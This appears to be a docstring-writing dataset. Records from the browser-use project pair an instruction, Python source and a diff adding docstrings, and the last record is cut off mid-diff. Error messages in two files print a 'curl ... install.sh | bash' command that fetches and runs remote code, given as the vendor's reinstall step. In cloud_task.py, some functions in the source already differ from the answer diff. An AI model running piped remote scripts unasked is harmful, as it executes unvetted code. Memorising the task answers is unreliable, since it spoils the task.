+ On Windows, uses ctypes to call OpenProcess (os.kill doesn't work reliably).
+ On Unix, uses os.kill(pid, 0) which is the standard approach.
+ """
if sys.platform == 'win32':
import ctypes
@@ -160,6 +174,7 @@
def is_server_running(session: str) -> bool:
+ """Check if server is running for session."""
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -172,6 +187,7 @@
def connect_to_server(session: str, timeout: float = 60.0) -> socket.socket:
+ """Connect to session server."""
sock_path = get_socket_path(session)
if sock_path.startswith('tcp://'):
@@ -191,10 +207,12 @@
def get_session_metadata_path(session: str) -> Path:
+ """Get path to session metadata file (stores browser_mode, headed, profile)."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
def ensure_server(session: str, browser: str, headed: bool, profile: str | None, api_key: str | None) -> bool:
+ """Start server if not running. Returns True if started."""
from browser_use.skill_cli.utils import is_session_locked, kill_orphaned_server
meta_path = get_session_metadata_path(session)
@@ -306,6 +324,7 @@
def send_command(session: str, action: str, params: dict) -> dict:
+ """Send command to server and get response."""
request = {
'id': f'r{int(time.time() * 1000000) % 1000000}',
'action': action,
@@ -340,6 +359,7 @@
def build_parser() -> argparse.ArgumentParser:
+ """Build argument parser with all commands."""
# Import install config to get available modes and default
from browser_use.skill_cli.install_config import get_available_modes, get_default_mode
@@ -806,6 +826,7 @@
def handle_server_command(args: argparse.Namespace) -> int:
+ """Handle server subcommands."""
if args.server_command == 'status':
if is_server_running(args.session):
print(f'Server for session "{args.session}" is running')
@@ -838,6 +859,7 @@
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
+ """Parse a list of 'key=value' strings into a dict."""
if not items:
return None
result: dict[str, str | None] = {}
@@ -849,6 +871,7 @@
def _handle_remote_run_with_wait(args: argparse.Namespace) -> int:
+ """Handle remote run with --wait directly (prints task info immediately, then waits)."""
import asyncio
from browser_use.skill_cli.commands import cloud_session, cloud_task
@@ -930,6 +953,7 @@
def main() -> int:
+ """Main entry point."""
parser = build_parser()
args = parser.parse_args()
@@ -1228,4 +1252,4 @@
if __name__ == '__main__':
- sys.exit(main())+ sys.exit(main())
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/main.py |
Generate docstrings for exported functions |
import argparse
import json
import logging
import sys
from typing import Any
from browser_use_sdk.types.task_created_response import TaskCreatedResponse
from browser_use_sdk.types.task_item_view import TaskItemView
from browser_use_sdk.types.task_log_file_response import TaskLogFileResponse
from browser_use_sdk.types.task_view import TaskView
from browser_use.skill_cli.commands.utils import format_duration, get_sdk_client
logger = logging.getLogger(__name__)
def _filter_none(kwargs: dict[str, Any]) -> dict[str, Any]:
return {k: v for k, v in kwargs.items() if v is not None}
# ============ SDK Wrappers ============
def create_task(task: str, **kwargs: Any) -> TaskCreatedResponse:
    """Create a new cloud task via the SDK.

    None-valued keyword arguments are dropped before the call, and the
    required ``task`` text always takes precedence over any 'task' kwarg.
    """
    request = {**_filter_none(kwargs), 'task': task}
    return get_sdk_client().tasks.create_task(**request)
def get_task(task_id: str) -> TaskView:
    """Fetch the current view of a cloud task by its ID."""
    client = get_sdk_client()
    return client.tasks.get_task(task_id)
def list_tasks(
    limit: int = 10,
    status: str | None = None,
    session_id: str | None = None,
) -> list[TaskItemView]:
    """Return up to ``limit`` task items, optionally filtered.

    ``status`` and ``session_id`` are only forwarded when given; an empty
    list is returned when the API response carries no items.
    """
    filters = _filter_none({'filter_by': status, 'session_id': session_id})
    response = get_sdk_client().tasks.list_tasks(page_size=limit, **filters)
    items = response.items
    return list(items) if items else []
def stop_task(task_id: str) -> TaskView:
    """Request that a running cloud task be stopped; returns the updated view."""
    sdk = get_sdk_client()
    return sdk.tasks.update_task(task_id, action='stop')
def get_task_logs(task_id: str) -> TaskLogFileResponse:
return get_sdk_client().tasks.get_task_logs(task_id)
async def poll_until_complete(
task_id: str,
stream: bool = False,
poll_interval: float = 1.0,
) -> TaskView:
import asyncio
client = get_sdk_client()
last_status = None
while True:
# Run blocking SDK call in thread to avoid blocking event loop
task = await asyncio.to_thread(client.tasks.get_task, task_id)
current_status = task.status
if stream and current_status != last_status:
print(f'Status: {current_status}')
last_status = current_status
if current_status in ('finished', 'stopped', 'failed'):
return task
await asyncio.sleep(poll_interval)
# ============ CLI Handlers ============
def handle_task_command(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
# Check if remote mode is available
if not is_mode_available('remote'):
print(
'Error: Task management requires remote mode.\n'
'Remote mode is not installed. Reinstall to enable:\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
file=sys.stderr,
)
return 1
# Check API key
try:
require_api_key('Cloud tasks')
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if args.task_command == 'list':
return _handle_list(args)
elif args.task_command == 'status':
return _handle_status(args)
elif args.task_command == 'stop':
return _handle_stop(args)
elif args.task_command == 'logs':
return _handle_logs(args)
else:
print('Usage: browser-use task <command>')
print('Commands: list, status <task_id>, stop <task_id>, logs <task_id>')
return 1
# ============ CLI Helper Functions ============
def _task_item_to_dict(task: Any) -> dict[str, Any]:
return {
'id': task.id,
'status': task.status,
'task': task.task,
'sessionId': task.session_id,
}
def _task_to_dict(task: Any) -> dict[str, Any]:
return {
'id': task.id,
'status': task.status,
'task': task.task,
'output': task.output,
'cost': task.cost,
'sessionId': task.session_id,
'startedAt': task.started_at.isoformat() if task.started_at else None,
'finishedAt': task.finished_at.isoformat() if task.finished_at else None,
'steps': [_step_to_dict(s) for s in (task.steps or [])],
}
def _step_to_dict(step: Any) -> dict[str, Any]:
return {
'number': step.number,
'url': step.url,
'memory': step.memory,
'actions': step.actions,
}
def _handle_list(args: argparse.Namespace) -> int:
try:
status_filter = getattr(args, 'status', None)
session_filter = getattr(args, 'session', None)
tasks = list_tasks(
limit=args.limit,
status=status_filter,
session_id=session_filter,
)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps([_task_item_to_dict(t) for t in tasks]))
else:
if not tasks:
status_msg = f' with status "{status_filter}"' if status_filter else ''
session_msg = f' in session "{session_filter}"' if session_filter else ''
print(f'No tasks found{status_msg}{session_msg}')
else:
header = f'Tasks ({len(tasks)})'
if status_filter:
header = f'{status_filter.capitalize()} tasks ({len(tasks)})'
print(f'{header}:')
for t in tasks:
task_id = t.id or 'unknown'
status = t.status or 'unknown'
task_desc = t.task or ''
# Truncate long task descriptions
if len(task_desc) > 50:
task_desc = task_desc[:47] + '...'
# Status emoji
status_emoji = {
'started': '🔄',
'running': '🔄',
'finished': '✅',
'stopped': '⏹️',
'failed': '❌',
}.get(status, '❓')
print(f' {status_emoji} {task_id[:8]}... [{status}] {task_desc}')
return 0
def _handle_status(args: argparse.Namespace) -> int:
try:
# Use get_task() for full details including steps
task = get_task(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_task_to_dict(task)))
else:
task_id = task.id or args.task_id
task_status = task.status or 'unknown'
output = task.output
cost = task.cost
steps = task.steps or []
started_at = task.started_at
finished_at = task.finished_at
compact = getattr(args, 'compact', False)
verbose = getattr(args, 'verbose', False)
last_n = getattr(args, 'last', None)
reverse = getattr(args, 'reverse', False)
specific_step = getattr(args, 'step', None)
# Determine display mode:
# - Default: show only latest step
# - --compact: show all steps with reasoning
# - --verbose: show all steps with full details
show_all_steps = compact or verbose
# Status emoji
status_emoji = {
'started': '🔄',
'running': '🔄',
'finished': '✅',
'stopped': '⏹️',
'failed': '❌',
}.get(task_status, '❓')
# Build header line: status, cost, duration
parts = [f'{status_emoji} {task_id[:8]}... [{task_status}]']
if cost is not None:
parts.append(f'${cost}')
duration = format_duration(started_at, finished_at)
if duration:
parts.append(duration)
print(' '.join(parts))
# Show steps
if steps:
total_steps = len(steps)
# Filter to specific step if requested
if specific_step is not None:
steps = [s for s in steps if s.number == specific_step]
if not steps:
print(f' Step {specific_step} not found (task has {total_steps} steps)')
else:
print(f' (showing step {specific_step} of {total_steps})')
# Display the specific step
for step in steps:
_print_step(step, verbose)
elif not show_all_steps:
# Default mode: show only the latest step
latest_step = steps[-1]
earlier_count = total_steps - 1
if earlier_count > 0:
print(f' ... {earlier_count} earlier steps')
_print_step(latest_step, verbose=False)
else:
# --compact or --verbose: show all steps (with optional filters)
skipped_earlier = 0
if last_n is not None and last_n < total_steps:
skipped_earlier = total_steps - last_n
steps = steps[-last_n:]
# Apply --reverse
if reverse:
steps = list(reversed(steps))
# Show count info
if skipped_earlier > 0:
print(f' ... {skipped_earlier} earlier steps')
# Display steps
for step in steps:
_print_step(step, verbose)
if output:
print(f'\nOutput: {output}')
return 0
def _print_step(step: Any, verbose: bool) -> None:
step_num = step.number if step.number is not None else '?'
memory = step.memory or ''
if verbose:
url = step.url or ''
actions = step.actions or []
# Truncate URL for display
short_url = url[:60] + '...' if len(url) > 60 else url
print(f' [{step_num}] {short_url}')
if memory:
# Truncate memory/reasoning for display
short_memory = memory[:100] + '...' if len(memory) > 100 else memory
print(f' Reasoning: {short_memory}')
if actions:
for action in actions[:2]: # Show max 2 actions per step
# Truncate action for display
short_action = action[:70] + '...' if len(action) > 70 else action
print(f' Action: {short_action}')
if len(actions) > 2:
print(f' ... and {len(actions) - 2} more actions')
else:
# Compact mode: just step number and reasoning
if memory:
# Truncate reasoning for compact display
short_memory = memory[:80] + '...' if len(memory) > 80 else memory
print(f' {step_num}. {short_memory}')
else:
print(f' {step_num}. (no reasoning)')
def _handle_stop(args: argparse.Namespace) -> int:
try:
stop_task(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'stopped': args.task_id}))
else:
print(f'Stopped task: {args.task_id}')
return 0
def _handle_logs(args: argparse.Namespace) -> int:
try:
result = get_task_logs(args.task_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'downloadUrl': result.download_url}))
else:
download_url = result.download_url
if download_url:
print(f'Download logs: {download_url}')
else:
print('No logs available for this task')
return 0 | --- +++ @@ -1,3 +1,9 @@+"""Cloud task SDK wrappers and CLI handlers.
+
+This module provides:
+- SDK wrapper functions for the Browser-Use Cloud Task API
+- CLI command handlers for `browser-use task <command>`
+"""
import argparse
import json
@@ -16,6 +22,7 @@
def _filter_none(kwargs: dict[str, Any]) -> dict[str, Any]:
+ """Filter out None values from kwargs (SDK passes them as null, API rejects)."""
return {k: v for k, v in kwargs.items() if v is not None}
@@ -23,12 +30,35 @@
def create_task(task: str, **kwargs: Any) -> TaskCreatedResponse:
+ """Create a cloud task via API.
+
+ Args:
+ task: Task description for the agent
+ llm: LLM model identifier
+ session_id: Existing session ID to use
+ max_steps: Maximum agent steps
+ flash_mode: Enable flash mode for faster execution
+ thinking: Enable extended reasoning mode
+ vision: Enable/disable vision
+ start_url: URL to start the task from
+ metadata: Task metadata key-value pairs
+ secrets: Task secrets key-value pairs
+ allowed_domains: Restrict navigation to these domains
+ skill_ids: Enable specific skill IDs
+ structured_output: JSON schema for structured output
+ judge: Enable judge mode
+ judge_ground_truth: Expected answer for judge evaluation
+
+ Returns:
+ TaskCreatedResponse with task ID and session ID
+ """
params = _filter_none(kwargs)
params['task'] = task
return get_sdk_client().tasks.create_task(**params)
def get_task(task_id: str) -> TaskView:
+ """Get full task details including steps."""
return get_sdk_client().tasks.get_task(task_id)
@@ -37,6 +67,7 @@ status: str | None = None,
session_id: str | None = None,
) -> list[TaskItemView]:
+ """List recent tasks."""
client = get_sdk_client()
response = client.tasks.list_tasks(
page_size=limit,
@@ -46,10 +77,12 @@
def stop_task(task_id: str) -> TaskView:
+ """Stop a running task."""
return get_sdk_client().tasks.update_task(task_id, action='stop')
def get_task_logs(task_id: str) -> TaskLogFileResponse:
+ """Get task execution logs."""
return get_sdk_client().tasks.get_task_logs(task_id)
@@ -58,6 +91,7 @@ stream: bool = False,
poll_interval: float = 1.0,
) -> TaskView:
+ """Poll task status until finished."""
import asyncio
client = get_sdk_client()
@@ -82,6 +116,16 @@
def handle_task_command(args: argparse.Namespace) -> int:
+ """Handle task subcommands.
+
+ Task commands manage cloud tasks and always require the cloud API.
+
+ Args:
+ args: Parsed command-line arguments
+
+ Returns:
+ Exit code (0 for success, 1 for error)
+ """
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
@@ -121,6 +165,7 @@
def _task_item_to_dict(task: Any) -> dict[str, Any]:
+ """Convert SDK TaskItemView to dict for JSON output."""
return {
'id': task.id,
'status': task.status,
@@ -130,6 +175,7 @@
def _task_to_dict(task: Any) -> dict[str, Any]:
+ """Convert SDK TaskView to dict for JSON output."""
return {
'id': task.id,
'status': task.status,
@@ -144,6 +190,7 @@
def _step_to_dict(step: Any) -> dict[str, Any]:
+ """Convert SDK step to dict for JSON output."""
return {
'number': step.number,
'url': step.url,
@@ -153,6 +200,7 @@
def _handle_list(args: argparse.Namespace) -> int:
+ """Handle 'task list' command."""
try:
status_filter = getattr(args, 'status', None)
session_filter = getattr(args, 'session', None)
@@ -200,6 +248,7 @@
def _handle_status(args: argparse.Namespace) -> int:
+ """Handle 'task status <task_id>' command."""
try:
# Use get_task() for full details including steps
task = get_task(args.task_id)
@@ -295,6 +344,7 @@
def _print_step(step: Any, verbose: bool) -> None:
+ """Print a single step in compact or verbose format."""
step_num = step.number if step.number is not None else '?'
memory = step.memory or ''
@@ -328,6 +378,7 @@
def _handle_stop(args: argparse.Namespace) -> int:
+ """Handle 'task stop <task_id>' command."""
try:
stop_task(args.task_id)
except Exception as e:
@@ -343,6 +394,7 @@
def _handle_logs(args: argparse.Namespace) -> int:
+ """Handle 'task logs <task_id>' command."""
try:
result = get_task_logs(args.task_id)
except Exception as e:
@@ -358,4 +410,4 @@ else:
print('No logs available for this task')
- return 0+ return 0
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/cloud_task.py |
Generate missing documentation strings |
import json
from pathlib import Path
from typing import Literal
CONFIG_PATH = Path.home() / '.browser-use' / 'install-config.json'
ModeType = Literal['chromium', 'real', 'remote']
# Local modes (both require Chromium to be installed)
LOCAL_MODES: set[str] = {'chromium', 'real'}
def get_config() -> dict:
if not CONFIG_PATH.exists():
return {
'installed_modes': ['chromium', 'real', 'remote'],
'default_mode': 'chromium',
}
try:
return json.loads(CONFIG_PATH.read_text())
except (json.JSONDecodeError, OSError):
# Config file corrupt, return default
return {
'installed_modes': ['chromium', 'real', 'remote'],
'default_mode': 'chromium',
}
def save_config(installed_modes: list[str], default_mode: str) -> None:
CONFIG_PATH.parent.mkdir(parents=True, exist_ok=True)
CONFIG_PATH.write_text(
json.dumps(
{
'installed_modes': installed_modes,
'default_mode': default_mode,
},
indent=2,
)
)
def is_mode_available(mode: str) -> bool:
config = get_config()
installed = config.get('installed_modes', [])
# Map 'real' to same category as 'chromium' (both are local)
# If either local mode is installed, both are available
if mode in LOCAL_MODES:
return bool(LOCAL_MODES & set(installed))
return mode in installed
def get_default_mode() -> str:
return get_config().get('default_mode', 'chromium')
def get_available_modes() -> list[str]:
return get_config().get('installed_modes', ['chromium', 'real', 'remote'])
def get_mode_unavailable_error(mode: str) -> str:
available = get_available_modes()
if mode in LOCAL_MODES:
install_flag = '--full'
mode_desc = 'Local browser mode'
else:
install_flag = '--full'
mode_desc = 'Remote browser mode'
return (
f"Error: {mode_desc} '{mode}' not installed.\n"
f'Available modes: {", ".join(available)}\n\n'
f'To install all modes, reinstall with:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- {install_flag}'
) | --- +++ @@ -1,3 +1,12 @@+"""Install configuration - tracks which browser modes are available.
+
+This module manages the installation configuration that determines which browser
+modes (chromium, real, remote) are available based on how browser-use was installed.
+
+Config file: ~/.browser-use/install-config.json
+
+When no config file exists (e.g., pip install users), all modes are available by default.
+"""
import json
from pathlib import Path
@@ -12,6 +21,10 @@
def get_config() -> dict:
+ """Read install config. Returns default if not found.
+
+ Default config enables all modes (for pip install users).
+ """
if not CONFIG_PATH.exists():
return {
'installed_modes': ['chromium', 'real', 'remote'],
@@ -29,6 +42,7 @@
def save_config(installed_modes: list[str], default_mode: str) -> None:
+ """Save install config."""
CONFIG_PATH.parent.mkdir(parents=True, exist_ok=True)
CONFIG_PATH.write_text(
json.dumps(
@@ -42,6 +56,14 @@
def is_mode_available(mode: str) -> bool:
+ """Check if a browser mode is available based on installation config.
+
+ Args:
+ mode: The browser mode to check ('chromium', 'real', or 'remote')
+
+ Returns:
+ True if the mode is available, False otherwise
+ """
config = get_config()
installed = config.get('installed_modes', [])
@@ -54,14 +76,24 @@
def get_default_mode() -> str:
+ """Get the default browser mode based on installation config."""
return get_config().get('default_mode', 'chromium')
def get_available_modes() -> list[str]:
+ """Get list of available browser modes."""
return get_config().get('installed_modes', ['chromium', 'real', 'remote'])
def get_mode_unavailable_error(mode: str) -> str:
+ """Generate a helpful error message when a mode is not available.
+
+ Args:
+ mode: The unavailable mode that was requested
+
+ Returns:
+ A formatted error message with instructions for reinstalling
+ """
available = get_available_modes()
if mode in LOCAL_MODES:
@@ -76,4 +108,4 @@ f'Available modes: {", ".join(available)}\n\n'
f'To install all modes, reinstall with:\n'
f' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- {install_flag}'
- )+ )
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/install_config.py |
Turn comments into proper docstrings |
import logging
import httpx
from bubus import BaseEvent
from browser_use.config import CONFIG
from browser_use.sync.auth import TEMP_USER_ID, DeviceAuthClient
logger = logging.getLogger(__name__)
class CloudSync:
def __init__(self, base_url: str | None = None, allow_session_events_for_auth: bool = False):
# Backend API URL for all API requests - can be passed directly or defaults to env var
self.base_url = base_url or CONFIG.BROWSER_USE_CLOUD_API_URL
self.auth_client = DeviceAuthClient(base_url=self.base_url)
self.session_id: str | None = None
self.allow_session_events_for_auth = allow_session_events_for_auth
self.auth_flow_active = False # Flag to indicate auth flow is running
# Check if cloud sync is actually enabled - if not, we should remain silent
self.enabled = CONFIG.BROWSER_USE_CLOUD_SYNC
async def handle_event(self, event: BaseEvent) -> None:
try:
# If cloud sync is disabled, don't handle any events
if not self.enabled:
return
# Extract session ID from CreateAgentSessionEvent
if event.event_type == 'CreateAgentSessionEvent' and hasattr(event, 'id'):
self.session_id = str(event.id) # type: ignore
# Send events based on authentication status and context
if self.auth_client.is_authenticated:
# User is authenticated - send all events
await self._send_event(event)
elif self.allow_session_events_for_auth:
# Special case: allow ALL events during auth flow
await self._send_event(event)
# Mark auth flow as active when we see a session event
if event.event_type == 'CreateAgentSessionEvent':
self.auth_flow_active = True
else:
# User is not authenticated and no auth in progress - don't send anything
logger.debug(f'Skipping event {event.event_type} - user not authenticated')
except Exception as e:
logger.error(f'Failed to handle {event.event_type} event: {type(e).__name__}: {e}', exc_info=True)
async def _send_event(self, event: BaseEvent) -> None:
try:
headers = {}
# Override user_id only if it's not already set to a specific value
# This allows CLI and other code to explicitly set temp user_id when needed
if self.auth_client and self.auth_client.is_authenticated:
# Only override if we're fully authenticated and event doesn't have temp user_id
current_user_id = getattr(event, 'user_id', None)
if current_user_id != TEMP_USER_ID:
setattr(event, 'user_id', str(self.auth_client.user_id))
else:
# Set temp user_id if not already set
if not hasattr(event, 'user_id') or not getattr(event, 'user_id', None):
setattr(event, 'user_id', TEMP_USER_ID)
# Add auth headers if available
if self.auth_client:
headers.update(self.auth_client.get_headers())
# Send event (batch format with direct BaseEvent serialization)
async with httpx.AsyncClient() as client:
# Serialize event and add device_id to all events
event_data = event.model_dump(mode='json')
if self.auth_client and self.auth_client.device_id:
event_data['device_id'] = self.auth_client.device_id
response = await client.post(
f'{self.base_url.rstrip("/")}/api/v1/events',
json={'events': [event_data]},
headers=headers,
timeout=10.0,
)
if response.status_code >= 400:
# Log error but don't raise - we want to fail silently
logger.debug(
f'Failed to send sync event: POST {response.request.url} {response.status_code} - {response.text}'
)
except httpx.TimeoutException:
logger.debug(f'Event send timed out after 10 seconds: {event}')
except httpx.ConnectError as e:
# logger.warning(f'⚠️ Failed to connect to cloud service at {self.base_url}: {e}')
pass
except httpx.HTTPError as e:
logger.debug(f'HTTP error sending event {event}: {type(e).__name__}: {e}')
except Exception as e:
logger.debug(f'Unexpected error sending event {event}: {type(e).__name__}: {e}')
# async def _update_wal_user_ids(self, session_id: str) -> None:
# """Update user IDs in WAL file after authentication"""
# try:
# assert self.auth_client, 'Cloud sync must be authenticated to update WAL user ID'
# wal_path = CONFIG.BROWSER_USE_CONFIG_DIR / 'events' / f'{session_id}.jsonl'
# if not await anyio.Path(wal_path).exists():
# raise FileNotFoundError(
# f'CloudSync failed to update saved event user_ids after auth: Agent EventBus WAL file not found: {wal_path}'
# )
# # Read all events
# events = []
# content = await anyio.Path(wal_path).read_text()
# for line in content.splitlines():
# if line.strip():
# events.append(json.loads(line))
# # Update user_id and device_id
# user_id = self.auth_client.user_id
# device_id = self.auth_client.device_id
# for event in events:
# if 'user_id' in event:
# event['user_id'] = user_id
# # Add device_id to all events
# event['device_id'] = device_id
# # Write back
# updated_content = '\n'.join(json.dumps(event) for event in events) + '\n'
# await anyio.Path(wal_path).write_text(updated_content)
# except Exception as e:
# logger.warning(f'Failed to update WAL user IDs: {e}')
def set_auth_flow_active(self) -> None:
self.auth_flow_active = True
async def authenticate(self, show_instructions: bool = True) -> bool:
# If cloud sync is disabled, don't authenticate
if not self.enabled:
return False
# Check if already authenticated first
if self.auth_client.is_authenticated:
import logging
logger = logging.getLogger(__name__)
if show_instructions:
logger.info('✅ Already authenticated! Skipping OAuth flow.')
return True
# Not authenticated - run OAuth flow
return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions) | --- +++ @@ -1,3 +1,6 @@+"""
+Cloud sync service for sending events to the Browser Use cloud.
+"""
import logging
@@ -11,6 +14,7 @@
class CloudSync:
+ """Service for syncing events to the Browser Use cloud"""
def __init__(self, base_url: str | None = None, allow_session_events_for_auth: bool = False):
# Backend API URL for all API requests - can be passed directly or defaults to env var
@@ -23,6 +27,7 @@ self.enabled = CONFIG.BROWSER_USE_CLOUD_SYNC
async def handle_event(self, event: BaseEvent) -> None:
+ """Handle an event by sending it to the cloud"""
try:
# If cloud sync is disabled, don't handle any events
if not self.enabled:
@@ -50,6 +55,7 @@ logger.error(f'Failed to handle {event.event_type} event: {type(e).__name__}: {e}', exc_info=True)
async def _send_event(self, event: BaseEvent) -> None:
+ """Send event to cloud API"""
try:
headers = {}
@@ -133,9 +139,11 @@ # logger.warning(f'Failed to update WAL user IDs: {e}')
def set_auth_flow_active(self) -> None:
+ """Mark auth flow as active to allow all events"""
self.auth_flow_active = True
async def authenticate(self, show_instructions: bool = True) -> bool:
+ """Authenticate with the cloud service"""
# If cloud sync is disabled, don't authenticate
if not self.enabled:
return False
@@ -150,4 +158,4 @@ return True
# Not authenticated - run OAuth flow
- return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions)+ return await self.auth_client.authenticate(agent_session_id=self.session_id, show_instructions=show_instructions)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/sync/service.py |
Generate docstrings for exported functions |
import logging
from typing import TYPE_CHECKING, Any
if TYPE_CHECKING:
from browser_use.skill_cli.sessions import SessionRegistry
logger = logging.getLogger(__name__)
COMMANDS = {'sessions', 'close'}
async def handle(action: str, session_name: str, registry: 'SessionRegistry', params: dict[str, Any]) -> Any:
if action == 'sessions':
sessions = registry.list_sessions()
return {
'sessions': sessions,
'count': len(sessions),
}
elif action == 'close':
if params.get('all'):
# Close all sessions and signal shutdown
sessions = registry.list_sessions()
await registry.close_all()
return {
'closed': [s['name'] for s in sessions],
'count': len(sessions),
'_shutdown': True, # Signal to stop server
}
else:
# Close this server's session and shutdown
await registry.close_session(session_name)
return {'closed': session_name, '_shutdown': True}
raise ValueError(f'Unknown session action: {action}') | --- +++ @@ -1,3 +1,4 @@+"""Session management command handlers."""
import logging
from typing import TYPE_CHECKING, Any
@@ -11,6 +12,7 @@
async def handle(action: str, session_name: str, registry: 'SessionRegistry', params: dict[str, Any]) -> Any:
+ """Handle session management command."""
if action == 'sessions':
sessions = registry.list_sessions()
return {
@@ -33,4 +35,4 @@ await registry.close_session(session_name)
return {'closed': session_name, '_shutdown': True}
- raise ValueError(f'Unknown session action: {action}')+ raise ValueError(f'Unknown session action: {action}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/session.py |
Help me comply with documentation standards |
from typing import Any
from pydantic import BaseModel
class SchemaOptimizer:
@staticmethod
def create_optimized_json_schema(
model: type[BaseModel],
*,
remove_min_items: bool = False,
remove_defaults: bool = False,
) -> dict[str, Any]:
# Generate original schema
original_schema = model.model_json_schema()
# Extract $defs for reference resolution, then flatten everything
defs_lookup = original_schema.get('$defs', {})
# Create optimized schema with flattening
# Pass flags to optimize_schema via closure
def optimize_schema(obj: Any, defs_lookup: dict[str, Any] | None = None, *, in_properties: bool = False) -> Any:
if isinstance(obj, dict):
optimized: dict[str, Any] = {}
flattened_ref: dict[str, Any] | None = None
# Skip unnecessary fields AND $defs (we'll inline everything)
skip_fields = ['additionalProperties', '$defs']
for key, value in obj.items():
if key in skip_fields:
continue
# Skip metadata "title" unless we're iterating inside an actual `properties` map
if key == 'title' and not in_properties:
continue
# Preserve FULL descriptions without truncation, skip empty ones
elif key == 'description':
if value: # Only include non-empty descriptions
optimized[key] = value
# Handle type field - must recursively process in case value contains $ref
elif key == 'type':
optimized[key] = value if not isinstance(value, (dict, list)) else optimize_schema(value, defs_lookup)
# FLATTEN: Resolve $ref by inlining the actual definition
elif key == '$ref' and defs_lookup:
ref_path = value.split('/')[-1] # Get the definition name from "#/$defs/SomeName"
if ref_path in defs_lookup:
# Get the referenced definition and flatten it
referenced_def = defs_lookup[ref_path]
flattened_ref = optimize_schema(referenced_def, defs_lookup)
# Skip minItems/min_items and default if requested (check BEFORE processing)
elif key in ('minItems', 'min_items') and remove_min_items:
continue # Skip minItems/min_items
elif key == 'default' and remove_defaults:
continue # Skip default values
# Keep all anyOf structures (action unions) and resolve any $refs within
elif key == 'anyOf' and isinstance(value, list):
optimized[key] = [optimize_schema(item, defs_lookup) for item in value]
# Recursively optimize nested structures
elif key in ['properties', 'items']:
optimized[key] = optimize_schema(
value,
defs_lookup,
in_properties=(key == 'properties'),
)
# Keep essential validation fields
elif key in [
'type',
'required',
'minimum',
'maximum',
'minItems',
'min_items',
'maxItems',
'pattern',
'default',
]:
optimized[key] = value if not isinstance(value, (dict, list)) else optimize_schema(value, defs_lookup)
# Recursively process all other fields
else:
optimized[key] = optimize_schema(value, defs_lookup) if isinstance(value, (dict, list)) else value
# If we have a flattened reference, merge it with the optimized properties
if flattened_ref is not None and isinstance(flattened_ref, dict):
# Start with the flattened reference as the base
result = flattened_ref.copy()
# Merge in any sibling properties that were processed
for key, value in optimized.items():
# Preserve descriptions from the original object if they exist
if key == 'description' and 'description' not in result:
result[key] = value
elif key != 'description': # Don't overwrite description from flattened ref
result[key] = value
return result
else:
# No $ref, just return the optimized object
# CRITICAL: Add additionalProperties: false to ALL objects for OpenAI strict mode
if optimized.get('type') == 'object':
optimized['additionalProperties'] = False
return optimized
elif isinstance(obj, list):
return [optimize_schema(item, defs_lookup, in_properties=in_properties) for item in obj]
return obj
optimized_result = optimize_schema(original_schema, defs_lookup)
# Ensure we have a dictionary (should always be the case for schema root)
if not isinstance(optimized_result, dict):
raise ValueError('Optimized schema result is not a dictionary')
optimized_schema: dict[str, Any] = optimized_result
# Additional pass to ensure ALL objects have additionalProperties: false
def ensure_additional_properties_false(obj: Any) -> None:
if isinstance(obj, dict):
# If it's an object type, ensure additionalProperties is false
if obj.get('type') == 'object':
obj['additionalProperties'] = False
# Recursively apply to all values
for value in obj.values():
if isinstance(value, (dict, list)):
ensure_additional_properties_false(value)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, (dict, list)):
ensure_additional_properties_false(item)
ensure_additional_properties_false(optimized_schema)
SchemaOptimizer._make_strict_compatible(optimized_schema)
# Final pass to remove minItems/min_items and default values if requested
if remove_min_items or remove_defaults:
def remove_forbidden_fields(obj: Any) -> None:
if isinstance(obj, dict):
# Remove forbidden keys
if remove_min_items:
obj.pop('minItems', None)
obj.pop('min_items', None)
if remove_defaults:
obj.pop('default', None)
# Recursively process all values
for value in obj.values():
if isinstance(value, (dict, list)):
remove_forbidden_fields(value)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, (dict, list)):
remove_forbidden_fields(item)
remove_forbidden_fields(optimized_schema)
return optimized_schema
@staticmethod
def _make_strict_compatible(schema: dict[str, Any] | list[Any]) -> None:
if isinstance(schema, dict):
# First recursively apply to nested objects
for key, value in schema.items():
if isinstance(value, (dict, list)) and key != 'required':
SchemaOptimizer._make_strict_compatible(value)
# Then update required for this level
if 'properties' in schema and 'type' in schema and schema['type'] == 'object':
# Add all properties to required array
all_props = list(schema['properties'].keys())
schema['required'] = all_props # Set all properties as required
elif isinstance(schema, list):
for item in schema:
SchemaOptimizer._make_strict_compatible(item)
@staticmethod
def create_gemini_optimized_schema(model: type[BaseModel]) -> dict[str, Any]:
return SchemaOptimizer.create_optimized_json_schema(model) | --- +++ @@ -1,3 +1,6 @@+"""
+Utilities for creating optimized Pydantic schemas for LLM usage.
+"""
from typing import Any
@@ -12,6 +15,18 @@ remove_min_items: bool = False,
remove_defaults: bool = False,
) -> dict[str, Any]:
+ """
